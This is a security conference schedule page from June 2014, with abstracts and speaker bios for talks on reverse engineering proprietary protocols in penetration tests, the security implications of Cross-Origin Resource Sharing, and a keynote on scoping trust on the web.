There is a big bunch of tools offering HTTP/SSL traffic interception. However, when it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all. Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. Though, based on our experience, it very often hides a shameful mystery - completely unsecured mechanisms breaking all good coding practices.

We would like to present our approach and a short guideline how to reverse engineer proprietary protocols - a world full of own implementations of asymmetric cryptography, revertible hash algorithms, lack of user authentication and no function or data access control at all.

To demonstrate, we will show 5 case-studies - most interesting examples from real-life financial industry software, which in our opinion are aquintessence of "security by obscurity". We will talk about homeautomation, embedded pull printing software in multifunction printers (MFP), remote desktop protocols and twisted vulnerabilities in FOREX trading software, which is particularly risky business regarding security.

Speakers

Slawomir Jasek

IT security consultant with over 10 years of experience. Participated in many assessments of systems' and applications' security, for leading financial companies and public institutions, including a few dozen e-banking systems. Currently focuses on consulting design of secure solutions... Read More →

Jakub Kaluzny

Sr. IT Security Consultant, SecuRing

Jakub is a Senior IT Security Consultant at SecuRing and performs penetration tests of high-risk applications, systems and devices. He was a speaker at many internetional conferences: BlackHat Asia, OWASP AppSec EU, PHdays, HackInTheBox, ZeroNights as well at local security events... Read More →

Thursday June 26, 2014 16:00 - 16:50 BST
LAB003

DevOps Track, DevOps

Company 83

16:00 BST

Security Implications of Cross-Origin Resource Sharing

HTML5 has been on the way for a couple of years now. There have been many discussions about its security implications and how they should be handled; however, these discussions usually stop at showing the most hyped and scariest vulnerabilities and their countermeasures. This presentation will continue the discussion on another level. To create state-of-the-art web applications with HTML5, all of its features should be analysed to see the risks they introduce and how they should be used properly.

This presentation will analyse the Cross-Origin Resource Sharing (CORS). This HTML5 feature allows websites to load resources from other domains, even from restricted environments, using the authentication tokens saved by the browser. This has interesting effects on various actors of the Internet. It affects the clients and the servers alike bringing a whole new trust relationships in the game. It also breaks with the relevant parts of the same-origin policy, one of the most important security features of web browsers and all of these happened without most people noticing.

The first part of my analysis will introduce the Cross-Origin Resource Sharing, how it works, how JSON-P, it's predecessor, was used and why CORS is interesting from a security perspective. The functional introduction will be followed with a threat analyses to show how CORS affects the traditional usage of XmlHttpRequests (XHR). Because it introduces a change in the way how websites communicate with each other it has an effect on pre-CORS websites as well. Most importantly it introduces a new way to attack web applications and overturns well known attacks such as Cross-Site Request Forgery and Cross-Site Tracing and gives them whole new possibilities. Examples for these will be presented in live demos.

The presentation will be concluded with outlining the methods to mitigate the security risks of Cross-Origin Resource Sharing. The methods will include ways to prepare a site to handle CORS properly and to build new web applications enjoying the new features of CORS without risking the data of our users.

Speakers

Gergely Revay

Siemens AG

Thursday June 26, 2014 16:00 - 16:50 BST
LAB026

Frameworks and Theories Track, Frame

Company 44

16:50 BST

Keynote - Reflections on Scoping Trust

In the modern Web environment, far from heeding Ken Thompson's admonition that "you can't trust code that you did not totally create yourself," we're required to trust a whole host of things we didn't create ourselves, including code, devices, infrastructure, and institutions. Sometimes, quite visibly of late, we've seen that trust betrayed by failures in components we shouldn't have needed to trust so broadly in the first place. This talk will examine gaps in our current models of trust and security scope, and consider how, short of writing our own compiler-compilers and everything on top, we can create a more trustworthy Web.

Speakers

Wendy Seltzer

Counsel and Strategy Lead, W3C

Wendy Seltzer is Policy Counsel and Technology & Society Domain Lead at the World Wide Web Consortium (W3C), where she leads work on privacy, security, and social web standards. As a visiting Fellow with Yale Law School's Information Society Project, she researches openness in intellectual... Read More →

Thursday June 26, 2014 16:50 - 17:40 BST
LAB026

Keynote

17:40 BST

Conference Closing Ceremony

Thursday June 26, 2014 17:40 - 18:00 BST
LAB026

14:00 BST

Summit Session - TBD

Monday June 30, 2014 14:00 - 18:00 BST
LAB215

Project Summit